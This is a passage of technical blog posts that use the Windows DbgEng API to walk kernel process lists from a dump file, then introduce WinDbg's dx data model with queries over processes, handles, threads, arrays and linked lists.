                            (PVOID*)&debugSymbols);
debugClient->QueryInterface(__uuidof(IDebugDataSpaces),
                            (PVOID*)&dataSpaces);
debugClient->QueryInterface(__uuidof(IDebugControl),
                            (PVOID*)&debugControl);

There, setup done. We can open our dump file with debugClient->OpenDumpFile and then wait until all symbol files are loaded:

debugClient->OpenDumpFile(DumpFilePath);
debugControl->WaitForEvent(DEBUG_WAIT_DEFAULT, 0);

Once the dump is loaded we can start reading it. The module we are most interested in here is nt — we are going to use the PsActiveProcessHead symbol as well as the EPROCESS structure that belong to it. So we need to get the base of the module using dataSpaces->ReadDebuggerData. This function receives 4 arguments — Index, Buffer, BufferSize and DataSize. The last one is an optional output parameter, telling us how many bytes were written, or if the buffer wasn’t large enough, how many bytes are needed. To keep things simple we will always pass nullptr as DataSize, since we know in advance the needed sizes for all of our data. The second and third arguments are pretty clear so no need to say much about them. And for the first argument we need to look at the list of options found at DbgEng.h:

// Indices for ReadDebuggerData interface
#define DEBUG_DATA_KernBase 24
#define DEBUG_DATA_BreakpointWithStatusAddr 32
#define DEBUG_DATA_SavedContextAddr 40
#define DEBUG_DATA_KiCallUserModeAddr 56
#define DEBUG_DATA_KeUserCallbackDispatcherAddr 64
#define DEBUG_DATA_PsLoadedModuleListAddr 72
#define DEBUG_DATA_PsActiveProcessHeadAddr 80
#define DEBUG_DATA_PspCidTableAddr 88
#define DEBUG_DATA_ExpSystemResourcesListAddr 96
#define DEBUG_DATA_ExpPagedPoolDescriptorAddr 104
#define DEBUG_DATA_ExpNumberOfPagedPoolsAddr 112
...

These are all commonly used symbols, so they get their own index to make querying their value faster and easier. Later in this post we’ll see how we can get the value of a symbol that is less common and isn’t on this list.

The first index on this list is, conveniently, DEBUG_DATA_KernBase. So we create a variable to get the base address of the nt module and call ReadDebuggerData:

ULONG64 kernBase;
dataSpaces->ReadDebuggerData(DEBUG_DATA_KernBase,
                             &kernBase,
                             sizeof(kernBase),
                             nullptr);

Next, we want to iterate over all the processes and print information about them. To do that we need the EPROCESS type. One annoying thing about the debugger API is that it doesn’t allow us to use types like we would if they were in a header file. We can’t declare a variable of type EPROCESS and access its fields. Instead we need to access memory through a type ID and the offsets inside the type. Foe example, if we want to access the ImageFileName field inside a process we will need to read the information that’s found in processAddr + imageFileNameOffset. But this is getting a bit ahead. First we need to get the type ID of _EPROCESS using debugSymbols->GetTypeId, which receives the module base, type name and an output argument for the type ID. As the name suggests, this function doesn’t give us the type itself, only an identifier that we’ll use to get offsets inside the structure:

ULONG EPROCESS;
debugSymbols->GetTypeId(kernBase, "_EPROCESS", &EPROCESS);

Now let’s get the offsets of the fields inside the EPROCESS so we can easily access them. Since we want to print the name and PID of each process we’ll need the ImageFileName and UniqueProcessId fields, in addition to ActiveProcessLinks so we iterate over the processes. To get those we’ll call debugSymbols->GetFieldOffset, which receives the module base, type ID, field name and an output argument that will receive the field offset:

ULONG imageFileNameOffset;
ULONG uniquePidOffset;
ULONG activeProcessLinksOffset;
debugSymbols->GetFieldOffset(kernBase,
                             EPROCESS,
                             "ImageFileName",
                             &imageFileNameOffset);
debugSymbols->GetFieldOffset(kernBase,
                             EPROCESS,
                             "UniqueProcessId",
                             &uniquePidOffset);
debugSymbols->GetFieldOffset(kernBase,
                             EPROCESS,
                             "ActiveProcessLinks",
                             &activeProcessLinksOffset);

To start iterating the process list we need to read PsActiveProcessHead. You might have noticed earlier that this symbol has an index in DbgEng.h so it can be read directly using ReadDebuggerData. But for this example we won’t read it that way, and instead show how to read it like a symbol that doesn’t have an index. So first we need to get the symbol offset in the dump file, using debugSymbols->GetOffsetByName:

ULONG64 activeProcessHead;
debugSymbols->GetOffsetByName("nt!PsActiveProcessHead",
                              &activeProcessHead);

This doesn’t give us the actual value yet, only the offset of this symbol. To get the value we’ll need to read the memory that this address points to from the dump using dataSpaces->ReadVirtual, which receives an address to read from, Buffer, BufferSize and an optional output argument BytesRead. We know that this symbol points to a LIST_ENTRY structure so we can just define a local linked list and read the variable into it. In this case we got lucky — the LIST_ENTRY structure is documented. If this symbol contained a non-documented structure this process would require a couple more steps and be a bit more painful.

LIST_ENTRY activeProcessLinks;
dataSpaces->ReadVirtual(activeProcessHead,
                        &activeProcessLinks,
                        sizeof(activeProcessLinks),
                        nullptr);

Now we have almost everything we need to start iterating the process list! We’ll define a local process variable and use it to store the address of the current process we’re looking at. In each iteration, activeProcessLinks.Flink will point to the first process in the system, but it won’t point to the beginning of the EPROCESS. It points to the ActiveProcessLinks field, so to get to the beginning of the structure we’ll need to subtract the offset of ActiveProcessLinks field from the address (basically what the CONTAINING_RECORD macro would do if we could use it here). Notice that we are using a ULONG64 here on purpose, instead of a ULONG_PTR to save us the pain of using pointer arithmetic and avoiding casts in future function calls, since most debugger API functions receive arguments as ULONG64:

ULONG64 process;
process = (ULONG64)activeProcessLinks.Flink - activeProcessLinksOffset;

The process iteration is pretty simple: for each process we want to read the ImageFileName value and the UniqueProcessId value, and then read the next process pointer from ActiveProcessLinks. Notice that we cannot access any of this data directly. The addresses we have are meaningless in the context of our current process (they are also kernel addresses, and our application is running in user mode and not necessarily on the right machine), so we need to call dataSpaces->ReadVirtual, or any of the other debugger functions that let us read data, to access this memory, and we will have to read these values for each process.

Generally we don’t have to read each value separately; we could also read the whole EPROCESS structure with debugSymbols->ReadTypedDataVirtual for each process and then access the fields by their offsets. But the EPROCESS structure is very large and we only need a few specific fields, so reading the whole structure is pretty wasteful and not necessary in this case.
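
If you do want the whole structure, a minimal sketch could look roughly like this (it assumes the documented GetTypeSize and ReadTypedDataVirtual signatures and skips error handling):

ULONG eprocessSize;
debugSymbols->GetTypeSize(kernBase, EPROCESS, &eprocessSize);

BYTE* processBuffer = new BYTE[eprocessSize];
debugSymbols->ReadTypedDataVirtual(process,
                                   kernBase,
                                   EPROCESS,
                                   processBuffer,
                                   eprocessSize,
                                   nullptr);
//
// Individual fields can then be read from the local copy using
// the offsets we queried earlier, for example
// processBuffer + imageFileNameOffset.
//
delete[] processBuffer;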

We now have everything we need to implement our process iteration:

UCHAR imageFileName[15];
ULONG64 uniquePid;
do
{
    //
    // Read process name, pid and activeProcessLinks
    // for the current process
    //
    dataSpaces->ReadVirtual(process + imageFileNameOffset,
                            &imageFileName,
                            sizeof(imageFileName),
                            nullptr);
    dataSpaces->ReadVirtual(process + uniquePidOffset,
                            &uniquePid,
                            sizeof(uniquePid),
                            nullptr);
    dataSpaces->ReadVirtual(process + activeProcessLinksOffset,
                            &activeProcessLinks,
                            sizeof(activeProcessLinks),
                            nullptr);
    printf("Current process name: %.15s, pid: %llu\n",
           imageFileName,
           uniquePid);
    //
    // Get the next process from the list and
    // subtract activeProcessLinksOffset
    // to get to the start of the EPROCESS.
    //
    process = (ULONG64)activeProcessLinks.Flink - activeProcessLinksOffset;
} while ((ULONG64)activeProcessLinks.Flink != activeProcessHead);

That’s it, that’s all we need to get this nice output:

Some of you might notice that a few of these process names look incomplete. This is because the ImageFileName field only has the first 15 bytes of the process name, while the full name is saved in an OBJECT_NAME_INFORMATION structure (which is actually just a UNICODE_STRING) in SeAuditProcessCreationInfo.ImageFileName. But in this post I wanted to keep things simple so we’ll use ImageFileName here.

Now we only have one last part left — being good developers and cleaning up after ourselves:

if (debugClient != nullptr)
{
    debugClient->EndSession(DEBUG_END_ACTIVE_DETACH);
    debugClient->Release();
}
if (debugSymbols != nullptr)
{
    debugSymbols->Release();
}
if (dataSpaces != nullptr)
{
    dataSpaces->Release();
}
if (debugControl != nullptr)
{
    debugControl->Release();
}

This was a very brief, but hopefully helpful, introduction to the debugger API. There are countless more options available with it; looking at DbgEng.h or at the official documentation should reveal a lot more. I hope you all find this as useful as I do and will find new and interesting things to use it for.



WinDbg — the Fun Way: Part 1


A while ago, WinDbg added support for a new debugger data model, a change that completely transformed the way we can use WinDbg. No more horrible MASM commands and obscure syntax. No more copying addresses or parameters to a Notepad file so that you can use them in the next commands without scrolling up. No more running the same command over and over with different addresses to iterate over a list or an array.

This is part 1 of this guide, because I didn’t actually think anyone would read through 8000 words of me explaining WinDbg commands. So you get 2 posts of 4000 words! That’s better, right?

In this first post we will learn the basics of how to use this new data model — using custom registers and new built-in registers, iterating over objects, searching them and filtering them and customizing them with anonymous types. And finally we will learn how to parse arrays and lists in a much nicer and easier way than you’re used to.

And in the next post we’ll learn the more complicated and fancier methods and features that this data model gives us. Now that we all know what to expect and have grabbed another cup of coffee, let’s start!

This data model, accessed in WinDbg through the dx command, is an extremely powerful tool, able to define custom variables, structures and functions and use a wide range of new capabilities. It also lets us search and filter information with LINQ, a query syntax modeled on database languages such as SQL.

This data model is documented and even has usage examples on GitHub. Additionally, all of its modules have documentation that can be viewed in the debugger with dx -v <method> (though you will get the same documentation if you run dx <method> without the -v flag):

dx -v Debugger.Utility.Collections.FromListEntry
Debugger.Utility.Collections.FromListEntry [FromListEntry(ListEntry, [<ModuleName | ModuleObject>], TypeName, FieldExpression) — Method which converts a LIST_ENTRY specified by the ‘ListEntry’ parameter of types whose name is specified by the string ‘TypeName’ and whose embedded links within that type are accessed via an expression specified by the string ‘FieldExpression’ into a collection object. If an optional module name or object is specified, the type name is looked up in the context of such module]

There has also been some external documentation, but I felt like there were things that needed further explanation and that this feature is worth more attention than it receives.

Custom Registers

First, NatVis adds the option for custom registers. Kind of like MASM had @$t1, @$t2, @$t3, etc. Only now you can call them whatever name you want, and they can have a type of your choice:

dx @$myString = "My String"
dx @$myInt = 123

We can see all our variables with dx @$vars and remove them with dx @$vars.Remove("var name"), or clear all of them with dx @$vars.Clear(). We can also use dx to handle more complicated structures, such as an EPROCESS. As you might know, symbols in public PDBs don’t have type information. With the old debugger, this wasn’t always a problem, since in MASM there are no types anyway, and we could use the poi command to dereference a pointer:

0: kd> dt nt!_EPROCESS poi(nt!PsInitialSystemProcess)
+0x000 Pcb : _KPROCESS
+0x2e0 ProcessLock : _EX_PUSH_LOCK
+0x2e8 UniqueProcessId : (null)
...

But things got messier when the variable isn’t a pointer, like with PsIdleProcess:

0: kd> dt nt!_KPROCESS @@masm(nt!PsIdleProcess)
+0x000 Header : _DISPATCHER_HEADER
+0x018 ProfileListHead : _LIST_ENTRY [ 0x00000048`0411017e - 0x00000000`00000004 ]
+0x028 DirectoryTableBase : 0xffffb10b`79f08010
+0x030 ThreadListHead : _LIST_ENTRY [ 0x00001388`00000000 - 0xfffff801`1b401000 ]
+0x040 ProcessLock : 0
+0x044 ProcessTimerDelay : 0
+0x048 DeepFreezeStartTime : 0xffffe880`00000000
...

We first have to use explicit MASM operators to get the address of PsIdleProcess and then print it as an EPROCESS. With dx we can be smarter and cast symbols directly, using c-style casts. But when we try to cast nt!PsInitialSystemProcess to a pointer to an EPROCESS:

dx @$systemProc = (nt!_EPROCESS*)nt!PsInitialSystemProcess
Error: No type (or void) for object at Address 0xfffff8074ef843a0

We get an error.

Like I mentioned, symbols have no type. And we can’t cast something with no type. So we need to take the address of the symbol, and cast it to a pointer to the type we want (In this case, PsInitialSystemProcess is already a pointer to an EPROCESS so we need to cast its address to a pointer to a pointer to an EPROCESS).

dx @$systemProc = *(nt!_EPROCESS**)&nt!PsInitialSystemProcess

Now that we have a typed variable, we can access its fields like we would do in C:

0: kd> dx @$systemProc->ImageFileName
@$systemProc->ImageFileName               [Type: unsigned char [15]]
[0] : 0x53 [Type: unsigned char]
[1] : 0x79 [Type: unsigned char]
[2] : 0x73 [Type: unsigned char]
[3] : 0x74 [Type: unsigned char]
[4] : 0x65 [Type: unsigned char]
[5] : 0x6d [Type: unsigned char]
[6] : 0x0 [Type: unsigned char]

And we can cast that to get a nicer output:

dx (char*)@$systemProc->ImageFileName
(char*)@$systemProc->ImageFileName                 : 0xffffc10c8e87e710 : "System" [Type: char *]

We can also use ToDisplayString to cast it from a char* to a string. We have two options — ToDisplayString("s"), which will cast it to a string and keep the quotes as part of the string, or ToDisplayString("sb"), which will remove them:

dx ((char*)@$systemProc->ImageFileName).ToDisplayString("s")
((char*)@$systemProc->ImageFileName).ToDisplayString("s") : "System"
Length : 0x8
dx ((char*)@$systemProc->ImageFileName).ToDisplayString("sb")
((char*)@$systemProc->ImageFileName).ToDisplayString("sb") : System
Length : 0x6

Built-in Registers

This is fun, but for processes (and a few other things) there is an even easier way. Together with NatVis’ implementation in WinDbg we got some “free” registers already containing some useful information — curframe, curprocess, cursession, curstack and curthread. It’s not hard to guess their contents by their names, but let’s take a look:

@$curframe

Gives us information about the current frame. I never actually used it myself, but it might be useful:

dx -r1 @$curframe.Attributes
@$curframe.Attributes                
InstructionOffset : 0xfffff8074ebda1e1
ReturnOffset : 0xfffff80752ad2b61
FrameOffset : 0xfffff80751968830
StackOffset : 0xfffff80751968838
FuncTableEntry : 0x0
Virtual : 1
FrameNumber : 0x0

@$curprocess

A container with information about the current process. This is not an EPROCESS (though it does contain it). It contains easily accessible information about the current process, like its threads, loaded modules, handles, etc.

dx @$curprocess
@$curprocess                 : System [Switch To]
KernelObject [Type: _EPROCESS]
Name : System
Id : 0x4
Handle : 0xf0f0f0f0
Threads
Modules
Environment
Devices
Io

In KernelObject we have the EPROCESS, but we can also use the other fields. For example, we can access all the handles held by the process through @$curprocess.Io.Handles, which will lead us to an array of handles, indexed by their handle number:

dx @$curprocess.Io.Handles
@$curprocess.Io.Handles                
[0x4]
[0x8]
[0xc]
[0x10]
[0x14]
[0x18]
[0x1c]
[0x20]
[0x24]
[0x28]
...

System has a lot of handles; these are just the first few! Let’s take a look at the first one (which we can also access through @$curprocess.Io.Handles[0x4]):

dx @$curprocess.Io.Handles.First()
@$curprocess.Io.Handles.First()                
Handle : 0x4
Type : Process
GrantedAccess : Delete | ReadControl | WriteDac | WriteOwner | Synch | Terminate | CreateThread | VMOp | VMRead | VMWrite | DupHandle | CreateProcess | SetQuota | SetInfo | QueryInfo | SetPort
Object [Type: _OBJECT_HEADER]

We can see the handle, the type of object the handle is for, its granted access, and we even have a pointer to the object itself (or its object header, to be precise)!

There are plenty more things to find under this register, and I encourage you to investigate them, but I will not show all of them.

By the way, have we mentioned already that dx allows tab completion?

@$cursession

As its name suggests, this register gives us information about the current debugger session:

dx @$cursession
@$cursession                 : Remote KD: KdSrv:Server=@{<Local>},Trans=@{NET:Port=55556,Key=1.2.3.4,Target=192.168.251.21}
Processes
Id : 0
Devices
Attributes

So, we can get information about our debugger session, which is always fun. But there are more useful things to be found here, such as the Processes field, which is an array of all processes, indexed by their PID. Let’s pick one of them:

dx @$cursession.Processes[0x1d8]
@$cursession.Processes[0x1d8]                 : smss.exe [Switch To]
KernelObject [Type: _EPROCESS]
Name : smss.exe
Id : 0x1d8
Handle : 0xf0f0f0f0
Threads
Modules
Environment
Devices
Io

Now we can get all that useful information about every single process! We can also search through the processes and filter them (by their name, by specific modules loaded into them, by strings in their command line, etc.). But I will explain all of that later.

@$curstack

This register contains a single field, Frames, which shows us the current stack in an easily handled way:

dx @$curstack.Frames
@$curstack.Frames                
[0x0] : nt!DbgBreakPointWithStatus + 0x1 [Switch To]
[0x1] : kdnic!TXTransmitQueuedSends + 0x125 [Switch To]
[0x2] : kdnic!TXSendCompleteDpc + 0x14d [Switch To]
[0x3] : nt!KiProcessExpiredTimerList + 0x169 [Switch To]
[0x4] : nt!KiRetireDpcList + 0x4e9 [Switch To]
[0x5] : nt!KiIdleLoop + 0x7e [Switch To]

@$curthread

Gives us information about the current thread, just like @$curprocess:

dx @$curthread
@$curthread                 : nt!DbgBreakPointWithStatus+0x1 (fffff807`4ebda1e1)  [Switch To]
KernelObject [Type: _ETHREAD]
Id : 0x0
Stack
Registers
Environment

It contains the ETHREAD in KernelObject, but also contains the TEB in Environment, and can show us the thread ID, stack and registers.

dx @$curthread.Registers
@$curthread.Registers                
User
Kernel
SIMD
FloatingPoint

We have them conveniently separated into user, kernel, SIMD and FloatingPoint registers, and we can look at each group separately:

dx -r1 @$curthread.Registers.Kernel
@$curthread.Registers.Kernel
cr0 : 0x80050033
cr2 : 0x207b8f7abbe
cr3 : 0x6d4002
cr4 : 0x370678
cr8 : 0xf
gdtr : 0xffff9d815ffdbfb0
gdtl : 0x57
idtr : 0xffff9d815ffd9000
idtl : 0xfff
tr : 0x40
ldtr : 0x0
kmxcsr : 0x1f80
kdr0 : 0x0
kdr1 : 0x0
kdr2 : 0x0
kdr3 : 0x0
kdr6 : 0xfffe0ff0
kdr7 : 0x400

xcr0 : 0x1f

Searching and Filtering

A very useful thing that NatVis allows us to do, which we briefly mentioned before, is searching, filtering and ordering information in an SQL-like way through Select, Where, OrderBy and more.

For example, let’s try to find all the processes that don’t enable high entropy ASLR. This information is stored in the EPROCESS->MitigationFlags field, and the value for HighEntropyASLREnabled is 0x20 (all values can be found here and in the public symbols).

First, we’ll declare a new register with that value, just to make things more readable:

0: kd> dx @$highEntropyAslr = 0x20
@$highEntropyAslr = 0x20 : 32

And then create our query to iterate over all processes and only pick ones where the HighEntropyASLREnabled bit is not set:

dx -r1 @$cursession.Processes.Where(p => (p.KernelObject.MitigationFlags & @$highEntropyAslr) == 0)
@$cursession.Processes.Where(p => (p.KernelObject.MitigationFlags & @$highEntropyAslr) == 0)                
[0x910] : spoolsv.exe [Switch To]
[0xb40] : IpOverUsbSvc.exe [Switch To]
[0x1610] : explorer.exe [Switch To]
[0x1d8c] : OneDrive.exe [Switch To]

Or we can check the flag directly through MitigationFlagsValues and get the same results:

dx -r1 @$cursession.Processes.Where(p => (p.KernelObject.MitigationFlagsValues.HighEntropyASLREnabled == 0))
@$cursession.Processes.Where(p => (p.KernelObject.MitigationFlagsValues.HighEntropyASLREnabled == 0))                
[0x910] : spoolsv.exe [Switch To]
[0xb40] : IpOverUsbSvc.exe [Switch To]
[0x1610] : explorer.exe [Switch To]
[0x1d8c] : OneDrive.exe [Switch To]

We can also use Select() to only show certain attributes of things we iterate over. Here we choose to see only the number of threads each process has:

dx @$cursession.Processes.Select(p => p.Threads.Count())
@$cursession.Processes.Select(p => p.Threads.Count())                
[0x0] : 0x6
[0x4] : 0xeb
[0x78] : 0x4
[0x1d8] : 0x5
[0x244] : 0xe
[0x294] : 0x8
[0x2a0] : 0x10
[0x2f8] : 0x9
[0x328] : 0xa
[0x33c] : 0xd
[0x3a8] : 0x2c
[0x3c0] : 0x8
[0x3c8] : 0x8
[0x204] : 0x15
[0x300] : 0x1d
[0x444] : 0x3f
...

We can also see everything in decimal by adding , d to the end of the command, to specify the output format (we can also use b for binary, o for octal or s for string):

dx @$cursession.Processes.Select(p => p.Threads.Count()), d
@$cursession.Processes.Select(p => p.Threads.Count()), d                
[0] : 6
[4] : 235
[120] : 4
[472] : 5
[580] : 14
[660] : 8
[672] : 16
[760] : 9
[808] : 10
[828] : 13
[936] : 44
[960] : 8
[968] : 8
[516] : 21
[768] : 29
[1092] : 63
...

Or, in a slightly more complicated example, see the ideal processor for each thread running in a certain process (I chose a process at random, just to see something that is not the System process):

dx -r1 @$cursession.Processes[0x1b2c].Threads.Select(t => t.Environment.EnvironmentBlock.CurrentIdealProcessor.Number)
@$cursession.Processes[0x1b2c].Threads.Select(t => t.Environment.EnvironmentBlock.CurrentIdealProcessor.Number)                
[0x1b30] : 0x1 [Type: unsigned char]
[0x1b40] : 0x2 [Type: unsigned char]
[0x1b4c] : 0x3 [Type: unsigned char]
[0x1b50] : 0x4 [Type: unsigned char]
[0x1b48] : 0x5 [Type: unsigned char]
[0x1b5c] : 0x0 [Type: unsigned char]
[0x1b64] : 0x1 [Type: unsigned char]

We can also use OrderBy to get nicer results, for example to get a list of all processes sorted in alphabetical order:

dx -r1 @$cursession.Processes.OrderBy(p => p.Name)
@$cursession.Processes.OrderBy(p => p.Name)                
[0x1848] : ApplicationFrameHost.exe [Switch To]
[0x0] : Idle [Switch To]
[0xb40] : IpOverUsbSvc.exe [Switch To]
[0x106c] : LogonUI.exe [Switch To]
[0x754] : MemCompression [Switch To]
[0x187c] : MicrosoftEdge.exe [Switch To]
[0x1b94] : MicrosoftEdgeCP.exe [Switch To]
[0x1b7c] : MicrosoftEdgeSH.exe [Switch To]
[0xb98] : MsMpEng.exe [Switch To]
[0x1158] : NisSrv.exe [Switch To]
[0x1d8c] : OneDrive.exe [Switch To]
[0x78] : Registry [Switch To]
[0x1ed0] : RuntimeBroker.exe [Switch To]
...

If we want them in a descending order, we can use OrderByDescending.
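
For example, a quick sketch of the same query in reverse order:

dx -r1 @$cursession.Processes.OrderByDescending(p => p.Name)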

But what if we want to pick more than one attribute to see? There is a solution for that too.

Anonymous Types

We can declare a type of our own that will be unnamed and only used in the scope of our query, using this syntax: Select(x => new { var1 = x.A, var2 = x.B, ...}).

We’ll try it out on one of our previous examples. Let’s say for each process we want to show a process name and its thread count:

dx @$cursession.Processes.Select(p => new {Name = p.Name, ThreadCount = p.Threads.Count()})
@$cursession.Processes.Select(p => new {Name = p.Name, ThreadCount = p.Threads.Count()})                
[0x0]
[0x4]
[0x78]
[0x1d8]
[0x244]
[0x294]
[0x2a0]
[0x2f8]
[0x328]
...

But now we only see the process container, not the actual information. To see the information itself we need to go one layer deeper, by using -r2. The number specifies the output recursion level. The default is -r1; -r0 will show no output, -r2 will show two levels, and so on.

dx -r2 @$cursession.Processes.Select(p => new {Name = p.Name, ThreadCount = p.Threads.Count()})
@$cursession.Processes.Select(p => new {Name = p.Name, ThreadCount = p.Threads.Count()})                
[0x0]
Name : Idle
ThreadCount : 0x6
[0x4]
Name : System
ThreadCount : 0xeb
[0x78]
Name : Registry
ThreadCount : 0x4
[0x1d8]
Name : smss.exe
ThreadCount : 0x5
[0x244]
Name : csrss.exe
ThreadCount : 0xe
[0x294]
Name : wininit.exe
ThreadCount : 0x8
[0x2a0]
Name : csrss.exe
ThreadCount : 0x10
...

This already looks much better, but we can make it look even nicer with the new grid view, accessed through the -g flag:

dx -g @$cursession.Processes.Select(p => new {Name = p.Name, ThreadCount = p.Threads.Count()})
Output of dx -g @$cursession.Processes.Select(p => new {Name = p.Name, ThreadCount = p.Threads.Count()})

OK, this just looks awesome. And yes, these headings are clickable and will sort the table!

And if we want to see the PIDs and thread numbers in decimal we can just add , d to the end of the command:

dx -g @$cursession.Processes.Select(p => new {Name = p.Name, ThreadCount = p.Threads.Count()}),d

Arrays and Lists

dx also gives us a new, much easier way to handle arrays and lists, with new syntax.
Let’s look at arrays first, where the syntax is dx *(TYPE(*)[Size])<pointer to array start>.

For this example, we will dump the contents of PsInvertedFunctionTable, which contains an array of up to 256 cached modules in its TableEntry field.

First, we will get the pointer of this symbol and cast it to _INVERTED_FUNCTION_TABLE:

dx @$inverted = (nt!_INVERTED_FUNCTION_TABLE*)&nt!PsInvertedFunctionTable
@$inverted = (nt!_INVERTED_FUNCTION_TABLE*)&nt!PsInvertedFunctionTable                 : 0xfffff8074ef9b010 [Type: _INVERTED_FUNCTION_TABLE *]
[+0x000] CurrentSize : 0xbe [Type: unsigned long]
[+0x004] MaximumSize : 0x100 [Type: unsigned long]
[+0x008] Epoch : 0x19e [Type: unsigned long]
[+0x00c] Overflow : 0x0 [Type: unsigned char]
[+0x010] TableEntry [Type: _INVERTED_FUNCTION_TABLE_ENTRY [256]]

Now we can create our array. Unfortunately, the size of the array has to be static and can’t use a register, so we need to input it manually, based on CurrentSize (or just set it to 256, which is the size of the whole array). And we can use the grid view to print it nicely:

dx -g @$tableEntry = *(nt!_INVERTED_FUNCTION_TABLE_ENTRY(*)[0xbe])@$inverted->TableEntry
Output of dx -g @$tableEntry = *(nt!_INVERTED_FUNCTION_TABLE_ENTRY(*)[0xbe])@$inverted->TableEntry

Alternatively, we can use the Take() method, which receives a number and prints that amount of elements from a collection, and get the same result:

dx -g @$inverted->TableEntry->Take(@$inverted->CurrentSize)

We can also do the same thing to see the UserInvertedFunctionTable (right after we switch to a process that’s not System), starting from nt!KeUserInvertedFunctionTable:

dx @$inverted = *(nt!_INVERTED_FUNCTION_TABLE**)&nt!KeUserInvertedFunctionTable
@$inverted = *(nt!_INVERTED_FUNCTION_TABLE**)&nt!KeUserInvertedFunctionTable                 : 0x7ffa19e3a4d0 [Type: _INVERTED_FUNCTION_TABLE *]
[+0x000] CurrentSize : 0x2 [Type: unsigned long]
[+0x004] MaximumSize : 0x200 [Type: unsigned long]
[+0x008] Epoch : 0x6 [Type: unsigned long]
[+0x00c] Overflow : 0x0 [Type: unsigned char]
[+0x010] TableEntry [Type: _INVERTED_FUNCTION_TABLE_ENTRY [256]]
dx -g @$inverted->TableEntry->Take(@$inverted->CurrentSize)

And of course we can use Select(), Where() or other functions to filter, sort or select only specific fields for our output and get tailored results that fit exactly what we need.
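
For example, a small sketch that keeps only a couple of fields from each cached entry (ImageBase and SizeOfImage are assumptions about the _INVERTED_FUNCTION_TABLE_ENTRY fields, so check them against your symbols first):

dx -g @$inverted->TableEntry->Take(@$inverted->CurrentSize).Select(e => new { Base = e.ImageBase, Size = e.SizeOfImage })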

The next thing to handle is lists. Windows is full of linked lists; you can find them everywhere, linking processes, threads, modules, DPCs, IRPs and more.

Fortunately the new data model has a very useful Debugger method, Debugger.Utility.Collections.FromListEntry, which takes a linked list head, a type and the name of the field in that type containing the LIST_ENTRY structure, and returns a container of all the list contents.

So, for our example let’s dump all the handle tables in the system. Our starting point will be the symbol nt!HandleTableListHead, the type of the objects in the list is nt!_HANDLE_TABLE and the field linking the list is HandleTableList:

dx -r2 Debugger.Utility.Collections.FromListEntry(*(nt!_LIST_ENTRY*)&nt!HandleTableListHead, "nt!_HANDLE_TABLE", "HandleTableList")
Debugger.Utility.Collections.FromListEntry(*(nt!_LIST_ENTRY*)&nt!HandleTableListHead, "nt!_HANDLE_TABLE", "HandleTableList")                
[0x0] [Type: _HANDLE_TABLE]
[+0x000] NextHandleNeedingPool : 0x3400 [Type: unsigned long]
[+0x004] ExtraInfoPages : 0 [Type: long]
[+0x008] TableCode : 0xffff8d8dcfd18001 [Type: unsigned __int64]
[+0x010] QuotaProcess : 0x0 [Type: _EPROCESS *]
[+0x018] HandleTableList [Type: _LIST_ENTRY]
[+0x028] UniqueProcessId : 0x4 [Type: unsigned long]
[+0x02c] Flags : 0x0 [Type: unsigned long]
[+0x02c ( 0: 0)] StrictFIFO : 0x0 [Type: unsigned char]
[+0x02c ( 1: 1)] EnableHandleExceptions : 0x0 [Type: unsigned char]
[+0x02c ( 2: 2)] Rundown : 0x0 [Type: unsigned char]
[+0x02c ( 3: 3)] Duplicated : 0x0 [Type: unsigned char]
[+0x02c ( 4: 4)] RaiseUMExceptionOnInvalidHandleClose : 0x0 [Type: unsigned char]
[+0x030] HandleContentionEvent [Type: _EX_PUSH_LOCK]
[+0x038] HandleTableLock [Type: _EX_PUSH_LOCK]
[+0x040] FreeLists [Type: _HANDLE_TABLE_FREE_LIST [1]]
[+0x040] ActualEntry [Type: unsigned char [32]]
[+0x060] DebugInfo : 0x0 [Type: _HANDLE_TRACE_DEBUG_INFO *]
[0x1] [Type: _HANDLE_TABLE]
[+0x000] NextHandleNeedingPool : 0x400 [Type: unsigned long]
[+0x004] ExtraInfoPages : 0 [Type: long]
[+0x008] TableCode : 0xffff8d8dcb651000 [Type: unsigned __int64]
[+0x010] QuotaProcess : 0xffffb90a530e4080 [Type: _EPROCESS *]
[+0x018] HandleTableList [Type: _LIST_ENTRY]
[+0x028] UniqueProcessId : 0x78 [Type: unsigned long]
[+0x02c] Flags : 0x10 [Type: unsigned long]
[+0x02c ( 0: 0)] StrictFIFO : 0x0 [Type: unsigned char]
[+0x02c ( 1: 1)] EnableHandleExceptions : 0x0 [Type: unsigned char]
[+0x02c ( 2: 2)] Rundown : 0x0 [Type: unsigned char]
[+0x02c ( 3: 3)] Duplicated : 0x0 [Type: unsigned char]
[+0x02c ( 4: 4)] RaiseUMExceptionOnInvalidHandleClose : 0x1 [Type: unsigned char]
[+0x030] HandleContentionEvent [Type: _EX_PUSH_LOCK]
[+0x038] HandleTableLock [Type: _EX_PUSH_LOCK]
[+0x040] FreeLists [Type: _HANDLE_TABLE_FREE_LIST [1]]
[+0x040] ActualEntry [Type: unsigned char [32]]
[+0x060] DebugInfo : 0x0 [Type: _HANDLE_TRACE_DEBUG_INFO *]
...

See the QuotaProcess field? That field points to the process that this handle table belongs to. Since every process has a handle table, this allows us to enumerate all the processes on the system in a way that’s not widely known. This method has been used by rootkits in the past to enumerate processes without being detected by EDR products. So to implement this we just need to Select() the QuotaProcess from each entry in our handle table list. To create a nicer looking output we can also create an anonymous container with the process name, PID and EPROCESS pointer:

dx -r2 (Debugger.Utility.Collections.FromListEntry(*(nt!_LIST_ENTRY*)&nt!HandleTableListHead, "nt!_HANDLE_TABLE", "HandleTableList")).Select(h => new { Object = h.QuotaProcess, Name = ((char*)h.QuotaProcess->ImageFileName).ToDisplayString("s"), PID = (__int64)h.QuotaProcess->UniqueProcessId})
(Debugger.Utility.Collections.FromListEntry(*(nt!_LIST_ENTRY*)&nt!HandleTableListHead, "nt!_HANDLE_TABLE", "HandleTableList")).Select(h => new { Object = h.QuotaProcess, Name = ((char*)h.QuotaProcess->ImageFileName).ToDisplayString("s"), PID = (__int64)h.QuotaProcess->UniqueProcessId})
[0x0]            : Unspecified error (0x80004005)
[0x1]
Object : 0xffffb10b70906080 [Type: _EPROCESS *]
Name : "Registry"
PID : 120 [Type: __int64]
[0x2]
Object : 0xffffb10b72eba0c0 [Type: _EPROCESS *]
Name : "smss.exe"
PID : 584 [Type: __int64]
[0x3]
Object : 0xffffb10b76586140 [Type: _EPROCESS *]
Name : "csrss.exe"
PID : 696 [Type: __int64]
[0x4]
Object : 0xffffb10b77132140 [Type: _EPROCESS *]
Name : "wininit.exe"
PID : 772 [Type: __int64]
[0x5]
Object : 0xffffb10b770a2080 [Type: _EPROCESS *]
Name : "csrss.exe"
PID : 780 [Type: __int64]
[0x6]
